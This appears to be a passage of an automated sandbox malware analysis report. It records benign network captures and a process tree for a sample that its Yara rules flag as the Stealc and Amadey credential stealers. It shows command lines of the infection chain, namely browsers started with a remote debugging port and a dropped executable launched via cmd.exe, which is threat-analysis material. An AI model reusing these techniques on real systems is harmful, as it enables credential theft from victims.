                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    147192.168.2.74993213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:02 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1395
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 9fc3e736-101e-0046-4391-3f91b0000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080702Z-174f7845968j6t2phC1EWRcfe80000000wtg000000006f1x
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    148192.168.2.749935104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC506OUTGET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    Content-Location: https://img.s-msn.com/tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t
                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 14 Nov 2024 00:11:17 GMT
                                                                                                                                                                                                                                                                                                                    X-Source-Length: 17955
                                                                                                                                                                                                                                                                                                                    X-Datacenter: northeu
                                                                                                                                                                                                                                                                                                                    X-ActivityId: 0a087112-3395-4d02-ae01-0e8f96fd1a66
                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                                                                                                                    X-ResizerVersion: 1.0
                                                                                                                                                                                                                                                                                                                    Content-Length: 8192
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=57860
                                                                                                                                                                                                                                                                                                                    Expires: Thu, 28 Nov 2024 00:11:22 GMT
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:02 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff c0 00 11 08 00 a8 00 a8 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa 01 00 03 01
                                                                                                                                                                                                                                                                                                                    Data Ascii: JFIF``}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    149192.168.2.74993313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:07:02 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 1358
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080702Z-174f7845968cpnpfhC1EWR3afc0000000w7000000000927m
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:07:02 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                                                                    Start time:03:06:04
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                                                                                    Imagebase:0xcd0000
                                                                                                                                                                                                                                                                                                                    File size:1'854'976 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:40FBF66FE2C47DCD8D2DE9191B48B355
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1825004684.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.1306919815.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1827339860.000000000191E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1825004684.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                                                                    Start time:03:06:19
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                                                                                    Start time:03:06:19
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2284,i,5232988169376499701,3184927908261316226,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                                                                                    Start time:04:49:11
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                                                                                                    Start time:04:49:11
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2196,i,16641813798157535699,2496316306201549847,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                                                                                                    Start time:04:49:11
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                                                                                    Start time:04:49:12
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                                                                                    Start time:04:49:17
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6484 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                                                                                    Start time:04:49:17
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6708 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                                                                                    Start time:04:49:39
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHDHJEBGH.exe"
                                                                                                                                                                                                                                                                                                                    Imagebase:0x410000
                                                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                                                                                    Start time:04:49:39
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                                                                                    Start time:04:49:39
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\DocumentsGDHDHJEBGH.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\DocumentsGDHDHJEBGH.exe"
                                                                                                                                                                                                                                                                                                                    Imagebase:0x860000
                                                                                                                                                                                                                                                                                                                    File size:1'947'648 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:FA098B363F56394EB669A96201D3521D
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.1907167232.0000000000861000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000003.1819555911.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                                                                                                    Start time:04:49:43
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                                                    File size:1'947'648 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:FA098B363F56394EB669A96201D3521D
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.1906378602.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000003.1865340368.0000000005100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                                                                                    Start time:04:49:47
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                                                                                                                    Imagebase:0x3f0000
